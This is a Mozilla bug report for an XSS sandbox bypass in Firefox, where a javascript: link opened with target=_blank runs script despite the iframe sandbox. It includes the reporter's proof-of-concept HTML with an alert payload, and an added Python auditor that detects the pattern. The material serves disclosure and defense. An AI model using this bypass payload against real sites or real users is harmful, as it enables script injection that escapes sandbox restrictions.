Bug 1744490 - iframe sandbox bypass with javascript URL and target _blank
Status: RESOLVED DUPLICATE of bug 1744352 (Closed)
Product / Component: Core :: DOM: Security (defect)
Opened 3 years ago; closed 3 years ago
Reporter: freddy; Unassigned
Keywords: reporter-external, sec-moderate, wsec-xss
Whiteboard: [reporter-external] [client-bounty-form]
This was received via email to security@ from Ed McManus:
Hi, I believe the following is an XSS vulnerability present in the current release channel. By specifying target="_blank" you can execute javascript in the domain of a sandboxed iframe.
This behavior is blocked by Edge, Chrome, and Safari. Demo: https://emcmanus.github.io/xss.html
Expected result:
Sandboxed iframes should not execute JS unless `allow-scripts` is specified
Firefox should block the `javascript:` uri
Actual result:
Javascript runs in the current domain, even though `allow-scripts` is not specified
Edge, Safari and Chrome block this behavior
It does not matter whether you use src or srcdoc
I believe a related bug was patched in Firefox 79: https://www.mozilla.org/en-US/security/advisories/mfsa2020-30/#CVE-2020-15653
Here is the source of the demo:
<!DOCTYPE html>
<html>
<head>
<meta http-equiv='content-type' content='text/html; charset=UTF-8'>
</head>
<body>
<!-- Sandbox grants allow-popups but not allow-scripts; the inner document is a
     javascript: link that opens in a new browsing context. The inner quotes are
     entity-escaped so the srcdoc attribute parses as a single value. -->
<iframe sandbox="allow-same-origin allow-popups" srcdoc="<a href=&quot;javascript:alert(document.domain)&quot; target=&quot;_blank&quot;>click me</a>"></iframe>
</body>
</html>
Flags: sec-bounty?
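As an added example that is not part of the report, a static check a site owner or reviewer could run over templates to find the pattern described above: a sandboxed iframe that withholds allow-scripts but whose srcdoc carries a javascript: link with target="_blank". It uses only the standard-library HTML parser; the sample inputs are constructed from the demo.

```python
from html.parser import HTMLParser

class _LinkScanner(HTMLParser):
    """Collect <a> elements whose href is a javascript: URL opened in _blank."""
    def __init__(self):
        super().__init__()  # convert_charrefs=True: &quot; etc. are decoded for us
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag != "a":
            return
        a = dict(attrs)
        href = (a.get("href") or "").strip()  # browsers also strip leading whitespace
        target = (a.get("target") or "").lower()
        if href.lower().startswith("javascript:") and target == "_blank":
            self.hits.append(href)

class SandboxAuditor(HTMLParser):
    """Flag sandboxed iframes that withhold allow-scripts but carry such a link."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)
        if "sandbox" not in a:
            return  # not sandboxed: the sandbox is not what is expected to block scripts
        tokens = set((a.get("sandbox") or "").split())
        if "allow-scripts" in tokens or not a.get("srcdoc"):
            return  # scripts allowed anyway, or no inline document to inspect
        scanner = _LinkScanner()
        scanner.feed(a["srcdoc"])  # the srcdoc value is already entity-decoded
        for href in scanner.hits:
            self.findings.append({"sandbox": sorted(tokens), "href": href})

def audit(html):
    auditor = SandboxAuditor()
    auditor.feed(html)
    return auditor.findings

# Constructed inputs: the demo from the report (inner quotes entity-escaped so the
# attribute parses) and a variant granting allow-scripts, which is not a bypass.
DEMO = ('<iframe sandbox="allow-same-origin allow-popups" srcdoc="<a href=&quot;'
        'javascript:alert(document.domain)&quot; target=&quot;_blank&quot;>click me</a>">'
        '</iframe>')
WITH_SCRIPTS = DEMO.replace('allow-popups"', 'allow-popups allow-scripts"')
```

audit(DEMO) returns one finding for the reported configuration, while audit(WITH_SCRIPTS) returns an empty list because scripts are granted explicitly there.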
History:
Updated 3 years ago:
  Group: firefox-core-security → dom-core-security
  Type: task → defect
  Component: Security → DOM: Security
  Keywords: sec-moderate, wsec-xss
  Product: Firefox → Core
  Whiteboard: [reporter-external] [client-bounty-form] [verif?] → [reporter-external] [client-bounty-form]
Updated 3 years ago:
  Status: NEW → RESOLVED
  Closed: 3 years ago
  Resolution: --- → DUPLICATE
Updated 3 years ago:
  Flags: sec-bounty? → sec-bounty-
Updated 1 year ago:
  Group: dom-core-security
Updated 3 months ago:
  Keywords: reporter-external